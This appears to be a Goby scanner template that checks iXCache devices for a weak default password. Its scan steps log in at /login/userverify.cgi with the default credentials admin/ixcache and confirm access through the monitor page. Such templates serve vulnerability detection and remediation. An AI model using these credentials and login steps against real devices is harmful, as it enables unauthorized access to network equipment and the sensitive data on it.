Goby/json/iXCache-has-weak-password-v...

104 lines
2.7 KiB
JSON
Raw Normal View History

2022-11-25 02:08:58 -08:00
{
"Name": "iXCache has weak password vulnerability",
"Level": "3",
"Tags": [
"weak password"
],
"GobyQuery": "(app=\"iXCache\" || title=\"iXCache\")",
"Description": "Beijing Paiwang Software Co., Ltd. iXCache has a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.",
"Product": "iXCache",
"Homepage": "https://www.panabit.com/",
"Author": "KangD1W2",
"Impact": "<p>Beijing Paiwang Software Co., Ltd. iXCache has a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.<br></p>",
"Recommandation": "<p>Modify weak password<br></p>",
"References": [
"https://www.panabit.com/",
"https://www.cnvd.org.cn/flaw/show/CNVD-2021-22461"
],
"HasExp": null,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/login/userverify.cgi",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "username=admin&password=ixcache"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "/cgi-bin/monitor.cgi",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "GET",
"uri": "/cgi-bin/monitor.cgi",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "/cgi-bin/Maintain/cfg_cmd",
"bz": ""
}
]
},
"SetVariable": [
"vulurl|lastheader|variable|{{{scheme}}}://admin:ixcache@{{{hostinfo}}}/login/userverify.cgi"
]
}
],
"ExploitSteps": null,
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
},
"DisclosureDate": "2021-04-30"
}